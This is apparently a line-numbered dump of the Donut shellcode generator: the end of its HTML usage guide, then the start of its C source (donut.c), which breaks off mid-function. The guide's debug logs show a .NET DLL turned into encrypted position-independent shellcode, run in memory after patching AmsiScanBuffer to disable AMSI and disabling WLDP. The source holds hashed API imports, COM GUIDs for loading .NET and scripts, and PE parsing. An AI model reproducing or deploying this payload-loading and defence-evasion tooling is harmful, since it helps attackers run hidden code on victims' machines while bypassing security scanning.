328 | DEBUG: donut.c:516:CreateModule(): Entering. | |
329 | DEBUG: donut.c:520:CreateModule(): Allocating 9504 bytes of memory for DONUT_MODULE | |
330 | DEBUG: donut.c:544:CreateModule(): Domain : TPYTXT7T | |
331 | DEBUG: donut.c:549:CreateModule(): Class : TestClass | |
332 | DEBUG: donut.c:552:CreateModule(): Method : RunProcess | |
333 | DEBUG: donut.c:559:CreateModule(): Runtime : v4.0.30319 | |
334 | DEBUG: donut.c:584:CreateModule(): Adding "calc.exe" | |
335 | DEBUG: donut.c:584:CreateModule(): Adding "notepad.exe" | |
336 | DEBUG: donut.c:610:CreateModule(): Leaving. | |
337 | DEBUG: donut.c:951:DonutCreate(): Creating instance | |
338 | DEBUG: donut.c:621:CreateInstance(): Entering. | |
339 | DEBUG: donut.c:624:CreateInstance(): Allocating space for instance | |
340 | DEBUG: donut.c:631:CreateInstance(): The size of module is 9504 bytes. Adding to size of instance. | |
341 | DEBUG: donut.c:643:CreateInstance(): Generating random key for instance | |
342 | DEBUG: donut.c:649:CreateInstance(): Generating random key for module | |
343 | DEBUG: donut.c:655:CreateInstance(): Generating random string to verify decryption | |
344 | DEBUG: donut.c:661:CreateInstance(): Generating random IV for Maru hash | |
345 | DEBUG: donut.c:666:CreateInstance(): Generating hashes for API using IV: 59e4ea34bad26f10 | |
346 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : LoadLibraryA = 710C9DA8846AE821 | |
347 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetProcAddress = 2334B1630D3B9C85 | |
348 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetModuleHandleA = 5389E01382E0391 | |
349 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualAlloc = 51EE6B0DB215095E | |
350 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualFree = F55A2169F30A6ED4 | |
351 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualQuery = 22DB7628044F6E32 | |
352 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualProtect = 688AA07FEF250016 | |
353 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : Sleep = 5BF1C1B408CCA4A5 | |
354 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : MultiByteToWideChar = 438AD242BBBC755 | |
355 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetUserDefaultLCID = 33ED1B2C1A2F9EC7 | |
356 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreate = 78AD2BFB55A5E7ED | |
357 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreateVector = 539F6582DE26F7BC | |
358 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayPutElement = 5057AD641F749DA0 | |
359 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayDestroy = A63C510FF032080E | |
360 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetLBound = A37979CE2EEDDA6 | |
361 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetUBound = 64A9C62452B8653C | |
362 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysAllocString = BFEEAAB6CE6017FB | |
363 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysFreeString = E6FD34B03A2701F6 | |
364 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : LoadTypeLib = 2A33214873ADC58C | |
365 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCrackUrlA = 1ADE3553184C68E1 | |
366 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetOpenA = 1DEDE3D32F2FCD3 | |
367 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetConnectA = 781FD6B18C99CAD2 | |
368 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetSetOptionA = 13EC8A292778FC3F | |
369 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetReadFile = 8D16E60E7C2E582A | |
370 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCloseHandle = C28E8A3AABB2A755 | |
371 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpOpenRequestA = 6C5189610A8545F5 | |
372 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpSendRequestA = 4DFA0D985988D31 | |
373 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpQueryInfoA = ED09A37256B27F04 | |
374 | DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CorBindToRuntime = FD669FABED4C6B7 | |
375 | DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CLRCreateInstance = 56B7AC5C110570B5 | |
376 | DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoInitializeEx = 3733F4734D12D7C | |
377 | DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoCreateInstance = FCB3EAC51E43319B | |
378 | DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoUninitialize = 908A347B45C6E4A2 | |
379 | DEBUG: donut.c:694:CreateInstance(): Copying GUID structures and DLL strings for loading .NET assemblies | |
380 | DEBUG: donut.c:791:CreateInstance(): Copying module data to instance | |
381 | DEBUG: donut.c:796:CreateInstance(): encrypting instance | |
382 | DEBUG: donut.c:808:CreateInstance(): Leaving. | |
383 | DEBUG: donut.c:959:DonutCreate(): Saving instance to file | |
384 | DEBUG: donut.c:992:DonutCreate(): PIC size : 33050 | |
385 | DEBUG: donut.c:999:DonutCreate(): Inserting opcodes | |
386 | DEBUG: donut.c:1035:DonutCreate(): Copying 15218 bytes of x86 + amd64 shellcode | |
387 | DEBUG: donut.c:259:unmap_file(): Unmapping | |
388 | DEBUG: donut.c:262:unmap_file(): Closing | |
389 | DEBUG: donut.c:1061:DonutCreate(): Leaving. | |
390 | [ Instance type : PIC | |
391 | [ Module file : "Class1.dll" | |
392 | [ File type : .NET DLL | |
393 | [ Class : TestClass | |
394 | [ Method : RunProcess | |
395 | [ Parameters : calc.exe,notepad.exe | |
396 | [ Target CPU : x86+AMD64 | |
397 | [ Shellcode : "payload.bin" | |
398 | ||
399 | DEBUG: donut.c:1069:DonutDelete(): Entering. | |
400 | DEBUG: donut.c:1088:DonutDelete(): Leaving. | |
401 | </pre> | |
402 | ||
403 | <p>Pass the instance as a parameter to payload.exe and it will run on the host system as if in a target environment.</p> | |
404 | ||
405 | <pre> | |
406 | c:\hub\donut\payload>payload ..\instance | |
407 | Running... | |
408 | DEBUG: payload.c:45:ThreadProc(): Maru IV : 1899033E0863343E | |
409 | DEBUG: payload.c:48:ThreadProc(): Resolving address for VirtualAlloc() : 9280348A6A2AFA7 | |
410 | DEBUG: payload.c:52:ThreadProc(): Resolving address for VirtualAlloc() : 3A49032E4107D985 | |
411 | DEBUG: payload.c:61:ThreadProc(): VirtualAlloc : 77535ED0 VirtualFree : 77535EF0 | |
412 | DEBUG: payload.c:63:ThreadProc(): Allocating 17800 bytes of RW memory | |
413 | DEBUG: payload.c:70:ThreadProc(): Copying 17800 bytes of data to memory 008D0000 | |
414 | DEBUG: payload.c:74:ThreadProc(): Zero initializing PDONUT_ASSEMBLY | |
415 | DEBUG: payload.c:82:ThreadProc(): Decrypting 17800 bytes of instance | |
416 | DEBUG: payload.c:89:ThreadProc(): Generating hash to verify decryption | |
417 | DEBUG: payload.c:91:ThreadProc(): Instance : c16c69caa83fb13f | Result : c16c69caa83fb13f | |
418 | DEBUG: payload.c:98:ThreadProc(): Resolving LoadLibraryA | |
419 | DEBUG: payload.c:104:ThreadProc(): Loading ole32.dll ... | |
420 | DEBUG: payload.c:104:ThreadProc(): Loading oleaut32.dll ... | |
421 | DEBUG: payload.c:104:ThreadProc(): Loading wininet.dll ... | |
422 | DEBUG: payload.c:104:ThreadProc(): Loading mscoree.dll ... | |
423 | DEBUG: payload.c:108:ThreadProc(): Resolving 33 API | |
424 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 066A0ED9815D3C92 | |
425 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for F3569749C64E1DA5 | |
426 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09280348A6A2AFA7 | |
427 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3A49032E4107D985 | |
428 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for FDE50FEB629EB834 | |
429 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4A4C764EFA89A84F | |
430 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5D388BA18E017E53 | |
431 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4EA2B25D8FAABD2B | |
432 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for F1D278132E49F050 | |
433 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for D05386A0F8FF7CAD | |
434 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8121B63764A390A6 | |
435 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for EB2BFAA408124470 | |
436 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 11B666F77E7303F6 | |
437 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for E8BD6B7A99981E38 | |
438 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for DE78E211DE61998B | |
439 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09D967C5479A0F9F | |
440 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6CA1D167C2BFFA9A | |
441 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for AD11F6324A205C5E | |
442 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5EAEF345362A2811 | |
443 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for A0CC0DC36E8EDD2C | |
444 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for A4241EDCC8B14F85 | |
445 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 756CEB8FF481A72E | |
446 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8116A255193A09CA | |
447 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for AB14A786531404A1 | |
448 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 1CF4A93D6896380A | |
449 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 61B393CC2DE33733 | |
450 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for ADAF62D44179684A | |
451 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 7F9591B7380CD749 | |
452 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3CC76B29D676544F | |
453 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 725AA978FD2B1255 | |
454 | DEBUG: peb.c:87:FindExport(): 725aa978fd2b1255 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx | |
455 | DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll | |
456 | DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx) | |
457 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6C0F670F3C85A407 | |
458 | DEBUG: peb.c:87:FindExport(): 6c0f670f3c85a407 is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance | |
459 | DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll | |
460 | DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance) | |
461 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 2996694CA69B44E8 | |
462 | DEBUG: peb.c:87:FindExport(): 2996694ca69b44e8 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize | |
463 | DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll | |
464 | DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize) | |
465 | DEBUG: payload.c:127:ThreadProc(): Using module embedded in instance | |
466 | DEBUG: inmem_dotnet.c:43:LoadAssembly(): Using module embedded in instance | |
467 | DEBUG: inmem_dotnet.c:51:LoadAssembly(): CLRCreateInstance | |
468 | DEBUG: inmem_dotnet.c:59:LoadAssembly(): ICLRMetaHost::GetRuntime("v4.0.30319") | |
469 | DEBUG: inmem_dotnet.c:66:LoadAssembly(): ICLRRuntimeInfo::IsLoadable | |
470 | DEBUG: inmem_dotnet.c:70:LoadAssembly(): ICLRRuntimeInfo::GetInterface | |
471 | DEBUG: inmem_dotnet.c:78:LoadAssembly(): HRESULT: 00000000 | |
472 | DEBUG: inmem_dotnet.c:100:LoadAssembly(): ICorRuntimeHost::Start | |
473 | DEBUG: inmem_dotnet.c:107:LoadAssembly(): ICorRuntimeHost::CreateDomain("TP7WFT9M") | |
474 | DEBUG: inmem_dotnet.c:115:LoadAssembly(): IUnknown::QueryInterface | |
475 | DEBUG: bypass.c:83:DisableAMSI(): Length of AmsiScanBuffer stub is 32 bytes. | |
476 | DEBUG: bypass.c:89:DisableAMSI(): Overwriting AmsiScanBuffer | |
477 | DEBUG: bypass.c:104:DisableAMSI(): Length of AmsiScanString stub is -16 bytes. | |
478 | DEBUG: inmem_dotnet.c:123:LoadAssembly(): DisableAMSI OK | |
479 | DEBUG: inmem_dotnet.c:127:LoadAssembly(): DisableWLDP OK | |
480 | DEBUG: inmem_dotnet.c:134:LoadAssembly(): Copying 3072 bytes of assembly to safe array | |
481 | DEBUG: inmem_dotnet.c:140:LoadAssembly(): AppDomain::Load_3 | |
482 | DEBUG: inmem_dotnet.c:147:LoadAssembly(): HRESULT : 00000000 | |
483 | DEBUG: inmem_dotnet.c:149:LoadAssembly(): Erasing assembly from memory | |
484 | DEBUG: inmem_dotnet.c:155:LoadAssembly(): SafeArrayDestroy | |
485 | DEBUG: inmem_dotnet.c:176:RunAssembly(): Using module embedded in instance | |
486 | DEBUG: inmem_dotnet.c:184:RunAssembly(): Type is DLL | |
487 | DEBUG: inmem_dotnet.c:255:RunAssembly(): SysAllocString("TestClass") | |
488 | DEBUG: inmem_dotnet.c:259:RunAssembly(): SysAllocString("RunProcess") | |
489 | DEBUG: inmem_dotnet.c:263:RunAssembly(): Assembly::GetType_2 | |
490 | DEBUG: inmem_dotnet.c:269:RunAssembly(): SafeArrayCreateVector(2 parameter(s)) | |
491 | DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "calc.exe" as parameter 1 | |
492 | DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "notepad.exe" as parameter 2 | |
493 | DEBUG: inmem_dotnet.c:292:RunAssembly(): Calling Type::InvokeMember_3 | |
494 | DEBUG: inmem_dotnet.c:306:RunAssembly(): Type::InvokeMember_3 : 00000000 : Success | |
495 | DEBUG: inmem_dotnet.c:323:FreeAssembly(): Type::Release | |
496 | DEBUG: inmem_dotnet.c:335:FreeAssembly(): Assembly::Release | |
497 | DEBUG: inmem_dotnet.c:341:FreeAssembly(): AppDomain::Release | |
498 | DEBUG: inmem_dotnet.c:347:FreeAssembly(): IUnknown::Release | |
499 | DEBUG: inmem_dotnet.c:353:FreeAssembly(): ICorRuntimeHost::Stop | |
500 | DEBUG: inmem_dotnet.c:356:FreeAssembly(): ICorRuntimeHost::Release | |
501 | DEBUG: inmem_dotnet.c:362:FreeAssembly(): ICLRRuntimeInfo::Release | |
502 | DEBUG: inmem_dotnet.c:368:FreeAssembly(): ICLRMetaHost::Release | |
503 | DEBUG: payload.c:171:ThreadProc(): Erasing RW memory for instance | |
504 | DEBUG: payload.c:174:ThreadProc(): Releasing RW memory for instance | |
505 | </pre> | |
506 | ||
507 | <p>Obviously you should be cautious with what files you decide to execute on your machine.</p> | |
508 | ||
509 | </body> | |
510 | </html> |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #include "donut.h" | |
32 | ||
33 | #include "payload/payload_exe_x86.h" | |
34 | #include "payload/payload_exe_x64.h" | |
35 | ||
36 | #define PUT_BYTE(p, v) { *(uint8_t *)(p) = (uint8_t) (v); p = (uint8_t*)p + 1; } | |
37 | #define PUT_HWORD(p, v) { t=v; memcpy((char*)p, (char*)&t, 2); p = (uint8_t*)p + 2; } | |
38 | #define PUT_WORD(p, v) { t=v; memcpy((char*)p, (char*)&t, 4); p = (uint8_t*)p + 4; } | |
39 | #define PUT_BYTES(p, v, n) { memcpy(p, v, n); p = (uint8_t*)p + n; } | |
40 | ||
41 | // these have to be in same order as DONUT_INSTANCE structure in donut.h | |
42 | static API_IMPORT api_imports[]= | |
43 | { | |
44 | {KERNEL32_DLL, "LoadLibraryA"}, | |
45 | {KERNEL32_DLL, "GetProcAddress"}, | |
46 | {KERNEL32_DLL, "GetModuleHandleA"}, | |
47 | {KERNEL32_DLL, "VirtualAlloc"}, | |
48 | {KERNEL32_DLL, "VirtualFree"}, | |
49 | {KERNEL32_DLL, "VirtualQuery"}, | |
50 | {KERNEL32_DLL, "VirtualProtect"}, | |
51 | {KERNEL32_DLL, "Sleep"}, | |
52 | {KERNEL32_DLL, "MultiByteToWideChar"}, | |
53 | {KERNEL32_DLL, "GetUserDefaultLCID"}, | |
54 | ||
55 | {OLEAUT32_DLL, "SafeArrayCreate"}, | |
56 | {OLEAUT32_DLL, "SafeArrayCreateVector"}, | |
57 | {OLEAUT32_DLL, "SafeArrayPutElement"}, | |
58 | {OLEAUT32_DLL, "SafeArrayDestroy"}, | |
59 | {OLEAUT32_DLL, "SafeArrayGetLBound"}, | |
60 | {OLEAUT32_DLL, "SafeArrayGetUBound"}, | |
61 | {OLEAUT32_DLL, "SysAllocString"}, | |
62 | {OLEAUT32_DLL, "SysFreeString"}, | |
63 | {OLEAUT32_DLL, "LoadTypeLib"}, | |
64 | ||
65 | {WININET_DLL, "InternetCrackUrlA"}, | |
66 | {WININET_DLL, "InternetOpenA"}, | |
67 | {WININET_DLL, "InternetConnectA"}, | |
68 | {WININET_DLL, "InternetSetOptionA"}, | |
69 | {WININET_DLL, "InternetReadFile"}, | |
70 | {WININET_DLL, "InternetCloseHandle"}, | |
71 | {WININET_DLL, "HttpOpenRequestA"}, | |
72 | {WININET_DLL, "HttpSendRequestA"}, | |
73 | {WININET_DLL, "HttpQueryInfoA"}, | |
74 | ||
75 | {MSCOREE_DLL, "CorBindToRuntime"}, | |
76 | {MSCOREE_DLL, "CLRCreateInstance"}, | |
77 | ||
78 | {OLE32_DLL, "CoInitializeEx"}, | |
79 | {OLE32_DLL, "CoCreateInstance"}, | |
80 | {OLE32_DLL, "CoUninitialize"}, | |
81 | ||
82 | { NULL, NULL } | |
83 | }; | |
84 | ||
85 | // required to load .NET assemblies | |
86 | static GUID xCLSID_CorRuntimeHost = { | |
87 | 0xcb2f6723, 0xab3a, 0x11d2, {0x9c, 0x40, 0x00, 0xc0, 0x4f, 0xa3, 0x0a, 0x3e}}; | |
88 | ||
89 | static GUID xIID_ICorRuntimeHost = { | |
90 | 0xcb2f6722, 0xab3a, 0x11d2, {0x9c, 0x40, 0x00, 0xc0, 0x4f, 0xa3, 0x0a, 0x3e}}; | |
91 | ||
92 | static GUID xCLSID_CLRMetaHost = { | |
93 | 0x9280188d, 0xe8e, 0x4867, {0xb3, 0xc, 0x7f, 0xa8, 0x38, 0x84, 0xe8, 0xde}}; | |
94 | ||
95 | static GUID xIID_ICLRMetaHost = { | |
96 | 0xD332DB9E, 0xB9B3, 0x4125, {0x82, 0x07, 0xA1, 0x48, 0x84, 0xF5, 0x32, 0x16}}; | |
97 | ||
98 | static GUID xIID_ICLRRuntimeInfo = { | |
99 | 0xBD39D1D2, 0xBA2F, 0x486a, {0x89, 0xB0, 0xB4, 0xB0, 0xCB, 0x46, 0x68, 0x91}}; | |
100 | ||
101 | static GUID xIID_AppDomain = { | |
102 | 0x05F696DC, 0x2B29, 0x3663, {0xAD, 0x8B, 0xC4,0x38, 0x9C, 0xF2, 0xA7, 0x13}}; | |
103 | ||
104 | // required to load VBS and JS files | |
105 | static GUID xIID_IUnknown = { | |
106 | 0x00000000, 0x0000, 0x0000, {0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46}}; | |
107 | ||
108 | static GUID xIID_IDispatch = { | |
109 | 0x00020400, 0x0000, 0x0000, {0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46}}; | |
110 | ||
111 | static GUID xIID_IHost = { | |
112 | 0x91afbd1b, 0x5feb, 0x43f5, {0xb0, 0x28, 0xe2, 0xca, 0x96, 0x06, 0x17, 0xec}}; | |
113 | ||
114 | static GUID xIID_IActiveScript = { | |
115 | 0xbb1a2ae1, 0xa4f9, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}}; | |
116 | ||
117 | static GUID xIID_IActiveScriptSite = { | |
118 | 0xdb01a1e3, 0xa42b, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}}; | |
119 | ||
120 | static GUID xIID_IActiveScriptParse32 = { | |
121 | 0xbb1a2ae2, 0xa4f9, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}}; | |
122 | ||
123 | static GUID xIID_IActiveScriptParse64 = { | |
124 | 0xc7ef7658, 0xe1ee, 0x480e, {0x97, 0xea, 0xd5, 0x2c, 0xb4, 0xd7, 0x6d, 0x17}}; | |
125 | ||
126 | static GUID xCLSID_VBScript = { | |
127 | 0xB54F3741, 0x5B07, 0x11cf, {0xA4, 0xB0, 0x00, 0xAA, 0x00, 0x4A, 0x55, 0xE8}}; | |
128 | ||
129 | static GUID xCLSID_JScript = { | |
130 | 0xF414C260, 0x6AC0, 0x11CF, {0xB6, 0xD1, 0x00, 0xAA, 0x00, 0xBB, 0xBB, 0x58}}; | |
131 | ||
132 | // required to load XSL files | |
133 | static GUID xCLSID_DOMDocument30 = { | |
134 | 0xf5078f32, 0xc551, 0x11d3, {0x89, 0xb9, 0x00, 0x00, 0xf8, 0x1f, 0xe2, 0x21}}; | |
135 | ||
136 | static GUID xIID_IXMLDOMDocument = { | |
137 | 0x2933BF81, 0x7B36, 0x11D2, {0xB2, 0x0E, 0x00, 0xC0, 0x4F, 0x98, 0x3E, 0x60}}; | |
138 | ||
139 | static GUID xIID_IXMLDOMNode = { | |
140 | 0x2933bf80, 0x7b36, 0x11d2, {0xb2, 0x0e, 0x00, 0xc0, 0x4f, 0x98, 0x3e, 0x60}}; | |
141 | ||
142 | #if defined(_WIN32) | defined(_WIN64) | |
143 | #include "include/mmap-windows.c" | |
144 | #ifdef _MSC_VER | |
145 | #define strcasecmp stricmp | |
146 | #endif | |
147 | #endif | |
148 | ||
149 | // return pointer to DOS header | |
150 | static PIMAGE_DOS_HEADER DosHdr(void *map) { | |
151 | return (PIMAGE_DOS_HEADER)map; | |
152 | } | |
153 | ||
154 | // return pointer to NT headers | |
155 | static PIMAGE_NT_HEADERS NtHdr (void *map) { | |
156 | return (PIMAGE_NT_HEADERS) ((uint8_t*)map + DosHdr(map)->e_lfanew); | |
157 | } | |
158 | ||
159 | // return pointer to File header | |
160 | static PIMAGE_FILE_HEADER FileHdr (void *map) { | |
161 | return &NtHdr(map)->FileHeader; | |
162 | } | |
163 | ||
164 | // determines CPU architecture of binary | |
165 | static int is32 (void *map) { | |
166 | return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_I386; | |
167 | } | |
168 | ||
169 | // return pointer to Optional header | |
170 | static void* OptHdr (void *map) { | |
171 | return (void*)&NtHdr(map)->OptionalHeader; | |
172 | } | |
173 | ||
174 | static PIMAGE_DATA_DIRECTORY Dirs (void *map) { | |
175 | if (is32(map)) { | |
176 | return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->DataDirectory; | |
177 | } else { | |
178 | return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->DataDirectory; | |
179 | } | |
180 | } | |
181 | ||
182 | // valid dos header? | |
183 | static int valid_dos_hdr (void *map) { | |
184 | PIMAGE_DOS_HEADER dos = DosHdr(map); | |
185 | ||
186 | if (dos->e_magic != IMAGE_DOS_SIGNATURE) return 0; | |
187 | return (dos->e_lfanew != 0); | |
188 | } | |
189 | ||
190 | // valid nt headers | |
191 | static int valid_nt_hdr (void *map) { | |
192 | return NtHdr(map)->Signature == IMAGE_NT_SIGNATURE; | |
193 | } | |
194 | ||
195 | static ULONG64 rva2ofs (void *base, DWORD rva) { | |
196 | DWORD i; | |
197 | ULONG64 ofs; | |
198 | PIMAGE_DOS_HEADER dos; | |
199 | PIMAGE_NT_HEADERS nt; | |
200 | PIMAGE_SECTION_HEADER sh; | |
201 | ||
202 | dos = (PIMAGE_DOS_HEADER)base; | |
203 | nt = (PIMAGE_NT_HEADERS)((PBYTE)base + dos->e_lfanew); | |
204 | sh = IMAGE_FIRST_SECTION(nt); | |
205 | ||
206 | for (i=0; i<nt->FileHeader.NumberOfSections; i++) { | |
207 | if (rva >= sh[i].VirtualAddress && | |
208 | rva < sh[i].VirtualAddress + sh[i].SizeOfRawData) { | |
209 | ||
210 | ofs = sh[i].PointerToRawData + (rva - sh[i].VirtualAddress); | |
211 | return ofs; | |
212 | } | |
213 | } | |
214 | return -1; | |
215 | } | |
216 | ||
217 | // map a file into memory for reading | |
218 | static int map_file(const char *path, file_info *fi) { | |
219 | struct stat fs; | |
220 | ||
221 | DPRINT("Reading size of file : %s", path); | |
222 | if(stat(path, &fs) != 0) { | |
223 | return DONUT_ERROR_FILE_NOT_FOUND; | |
224 | } | |
225 | ||
226 | if(fs.st_size == 0) { | |
227 | return DONUT_ERROR_FILE_EMPTY; | |
228 | } | |
229 | ||
230 | DPRINT("Opening %s", path); | |
231 | fi->fd = open(path, O_RDONLY); | |
232 | ||
233 | if(fi->fd < 0) { | |
234 | return DONUT_ERROR_FILE_ACCESS; | |
235 | } | |
236 | ||
237 | fi->size = fs.st_size; | |
238 | ||
239 | // map into memory | |
240 | DPRINT("Mapping %" PRIi64 " bytes for %s", fi->size, path); | |
241 | fi->map = mmap(NULL, fi->size, | |
242 | PROT_READ, MAP_PRIVATE, fi->fd, 0); | |
243 | ||
244 | // no mapping? close file | |
245 | if(fi->map == NULL) { | |
246 | close(fi->fd); | |
247 | fi->map = NULL; | |
248 | return DONUT_ERROR_NO_MEMORY; | |
249 | } | |
250 | return DONUT_ERROR_SUCCESS; | |
251 | } | |
252 | ||
253 | // unmap a file from memory previously opened with map_file() | |
254 | static int unmap_file(file_info *fi) { | |
255 | ||
256 | if(fi == NULL) return 0; | |
257 | ||
258 | DPRINT("Unmapping"); | |
259 | munmap(fi->map, fi->size); | |
260 | ||
261 | DPRINT("Closing"); | |
262 | close(fi->fd); | |
263 | ||
264 | return 1; | |
265 | } | |
266 | ||
267 | static int get_file_info(const char *path, file_info *fi) { | |
268 | PIMAGE_NT_HEADERS nt; | |
269 | PIMAGE_DATA_DIRECTORY dir; | |
270 | PMDSTORAGESIGNATURE pss; | |
271 | PIMAGE_COR20_HEADER cor; | |
272 | DWORD dll, rva, ofs, cpu; | |
273 | PCHAR ext; | |
274 | int err = DONUT_ERROR_SUCCESS; | |
275 | ||
276 | DPRINT("Entering."); | |
277 | ||
278 | // invalid parameters passed? | |
279 | if(path == NULL || fi == NULL) { | |
280 | return DONUT_ERROR_INVALID_PARAMETER; | |
281 | } | |
282 | // zero initialize file_info structure | |
283 | memset(fi, 0, sizeof(file_info)); | |
284 | ||
285 | DPRINT("Checking extension of %s", path); | |
286 | ext = strrchr(path, '.'); | |
287 | ||
288 | // no extension? exit | |
289 | if(ext == NULL) { | |
290 | return DONUT_ERROR_FILE_INVALID; | |
291 | } | |
292 | DPRINT("Extension is \"%s\"", ext); | |
293 | ||
294 | // VBScript? | |
295 | if (strcasecmp(ext, ".vbs") == 0) { | |
